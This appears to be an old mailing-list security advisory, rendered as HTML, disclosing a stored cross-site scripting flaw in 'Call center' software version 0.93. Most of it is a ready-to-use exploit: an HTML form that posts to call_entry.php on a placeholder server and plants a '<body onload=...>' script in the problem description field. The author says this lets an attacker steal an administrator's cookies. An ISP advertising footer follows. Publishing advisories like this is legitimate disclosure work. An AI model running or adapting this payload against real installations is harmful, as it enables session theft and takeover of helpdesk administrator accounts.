<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7651.51">
<TITLE>Call Center Software - Remote Xss Post Exploit -</TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->
<P><FONT SIZE=2>-=[--------------------ADVISORY-------------------]=-<BR>
<BR>
Call center 0,93<BR>
<BR>
Author: CorryL [corryl80@gmail.com] <BR>
-=[-----------------------------------------------]=-<BR>
<BR>
<BR>
-=[+] Application: Call senter<BR>
-=[+] Version: 0,93<BR>
-=[+] Vendor's URL: <A HREF="http://www.call-center-software.org/">http://www.call-center-software.org/</A><BR>
-=[+] Platform: Windows\Linux\Unix<BR>
-=[+] Bug type: Cross-Site Script<BR>
-=[+] Exploitation: Remote<BR>
-=[-]<BR>
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~<BR>
-=[+] Reference: www.xoned.net<BR>
-=[+] Virtual Office: <A HREF="http://www.kasamba.com/CorryL">http://www.kasamba.com/CorryL</A><BR>
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck <BR>
<BR>
<BR>
..::[ Descriprion ]::..<BR>
<BR>
Call center software is one of the most important aspects of any call help center,<BR>
being able to track and manage calls can be the key to high customer safisfacation.<BR>
Our 100% free call center software solution is based on php and the mysql database.<BR>
<BR>
<BR>
..::[ Bug ]::..<BR>
<BR>
An attacker exploiting this vulnerability is able steal the content<BR>
the cookies of the consumer admin in fact the bug situated is on an request post<BR>
then he remains memorized inside the database in attends him that the admin<BR>
goes to read the content of the call<BR>
<BR>
..::[Exploit]::..<BR>
<BR>
<html><BR>
<head><BR>
<title>Call Center</title><BR>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><BR>
<link rel="stylesheet" href="helpdesk.css" type="text/css"><BR>
</head><BR>
<BR>
<body><BR>
<table bgcolor="#FFFFFF" width="100%"><BR>
<tr><BR>
<td align="center"><BR>
<form method="post" action="<A HREF="http://remote_server/path/call_entry.php">http://remote_server/path/call_entry.php</A>"><BR>
<table border="0"><BR>
<tr><BR>
<th class="ttitle">Adding Call</th><BR>
</tr><BR>
<tr><BR>
<td><BR>
<table width="100%" border="0" cellspacing="0" cellpadding="3"><BR>
<tr><BR>
<td align="right">Name:&nbsp;</td><td align="left"><input type="text" name="name" Value="H4ck3r"size="30"></td><BR>
</tr><BR>
<tr><BR>
<td align="right">Phone:&nbsp;</td><td align="left"><input type="text" name="phone" value="111-555-555" size="20"></td><BR>
</tr><BR>
<tr><BR>
<td align="right">Department:&nbsp;</td><BR>
<td><BR>
<select name="department_id"><BR>
<option value="1">Problem</option><BR>
</select><BR>
</td><BR>
</tr><BR>
<tr><BR>
<td align="right">Issue Type:&nbsp;</td><BR>
<td><BR>
<select name="issue_id"><BR>
<option value="6">email</option><BR>
<option value="2">keyboard</option><BR>
<option value="3">monitor</option><BR>
<option value="5">mouse</option><BR>
<option value="4">network</option><BR>
<option value="8">password</option><BR>
<option value="7">word processing</option><BR>
</select><BR>
</td><BR>
</tr><BR>
<tr><BR>
<td align="right" valign="top">Xss Script Here :&nbsp;</td><BR>
<td align="left"><input type="text" name="problem_desc" value="<body onload=alert(1395499912)>" size="50"></td><BR>
</tr><BR>
<tr><BR>
<td>&nbsp;</td><td><input type="submit" name="submit" value="Add" class="button"></td><BR>
</tr><BR>
</table><BR>
</td><BR>
</tr><BR>
</table><BR>
</form><BR>
</td><BR>
</tr> <BR>
</table><BR>
</body><BR>
</html><BR>
<BR>
<BR>
<BR>
**************<BR>
Registrati ad Alice Basic e scarica Alice Messenger,<BR>
il nuovo instant messenger che ti fa chattare GRATIS con i tuoi amici!<BR>
Per maggiori informazioni vai su:<BR>
<A HREF="http://adsl.alice.it/servizi/alicebasic.html?pmk=psmail_foot01">http://adsl.alice.it/servizi/alicebasic.html?pmk=psmail_foot01</A></FONT>
</P>
</BODY>
</HTML>